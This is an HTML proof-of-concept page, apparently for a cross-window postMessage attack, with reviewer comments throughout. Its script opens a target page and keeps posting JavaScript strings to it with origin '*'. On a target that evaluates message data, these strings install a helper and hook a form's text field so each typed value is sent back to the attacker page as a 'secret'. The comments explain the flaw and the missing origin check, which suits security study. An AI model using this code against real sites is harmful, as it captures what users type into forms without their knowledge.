sop-attacker.html
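<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>sop-attacker.html</title>
</head>
<body>
<!-- Opener page of the PoC: the script below opens sop-target.html in a named
     window and listens for messages that window posts back. What the messages
     achieve depends entirely on how sop-target.html treats event.data and
     event.origin; that file is not part of this listing. -->
<p>POC based on <a href="https://isitsafe.co.uk/SecurityHeaders/halifax/" rel="noopener noreferrer">https://isitsafe.co.uk/SecurityHeaders/halifax/</a></p>
<div>
<!-- Filled by the 'message' listener; written with innerText, never innerHTML -->
<p>Secret: <span id="secret"></span></p>
</div>
<script>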
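/**
 * Opens sop-target.html in the named window "sopttarget", stores the handle in
 * the (undeclared, hence global) variable `openedWindow` that intercept() reads,
 * and starts intercept().
 *
 * Returns false in every case so it can also serve as an inline click handler.
 * window.open() returns null when the popup is blocked; the original then threw a
 * TypeError inside intercept() (null.postMessage), so that case is now logged and
 * skipped instead.
 */
function openTarget() {
  // Intentionally assigned without var/let: intercept() relies on the global.
  openedWindow = window.open("sop-target.html", "sopttarget");
  if (!openedWindow) {
    console.log("window.open returned null (popup blocked?); not starting intercept()");
    return false;
  }
  intercept();
  return false;
}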
// Runs at load time, before the 'message' listener below is registered.
openTarget();
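/*
 * Receives messages posted back by the opened window.
 *
 * Expected payload shape (as used below; not otherwise specified in this file):
 *   { response: 'valid' }         -> stop the intercept() retry loop
 *   { secretChange: <string> }    -> display the value in #secret
 *
 * NOTE(review): there is no event.origin check, so any window that holds a
 * reference to this one can post these messages; a hardened listener would
 * compare event.origin against the expected origin of sop-target.html before
 * reading event.data.
 *
 * Fix relative to the original: the original declared a local
 * `var retryTimer = null` inside this handler, which shadowed the global set by
 * intercept(); clearTimeout(null) was a no-op and the retry loop never stopped.
 */
window.addEventListener('message', function (event) {
  var eventData = event.data;
  // A primitive or null payload would throw on the property accesses below.
  if (!eventData || typeof eventData !== 'object') {
    return;
  }
  if (eventData.response == 'valid') {
    // window.retryTimer is the undeclared global assigned by intercept();
    // reading it via window avoids a ReferenceError if intercept() never ran.
    clearTimeout(window.retryTimer);
    window.retryTimer = null;
  }
  if (eventData.secretChange) {
    // innerText, not innerHTML: the value originates in another window and
    // must be rendered as text, never parsed as markup.
    document.getElementById('secret').innerText = eventData.secretChange;
  }
});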
/**
 * Posts two JavaScript source strings to the opened window and re-arms itself
 * every 500 ms via the global `retryTimer` (assigned without declaration).
 *
 * The strings are sent as plain message data. They only have an effect if
 * sop-target.html treats event.data as code (e.g. passes it to eval or similar)
 * without validating event.origin — presumably the weakness this PoC is meant
 * to demonstrate; that file is not visible here, so this is an inference. A
 * target that checks event.origin and handles message data strictly as data is
 * unaffected by these messages.
 */
function intercept() {
  // Payload 1: defines a helper on the target that relays (name, value) pairs
  // back to window.opener with a '*' target origin.
  var helperSource = "window.parentPost=function(name,val) { try { var obj={};obj[name]=val;window.opener.postMessage(obj,'*'); } catch (e) { console.log(e); } }";
  // Payload 2: wires the first form's 'text' element 'change' event to that helper.
  var hookSource = "document.forms[0].elements['text'].addEventListener('change',function() {parentPost('secretChange',this.value);})";

  [helperSource, hookSource].forEach(function (source) {
    openedWindow.postMessage(source, "*");
  });

  // Re-run until something else clears the timer (see the 'message' listener).
  retryTimer = setTimeout(intercept, 500);
}
</script>
</body>
</html>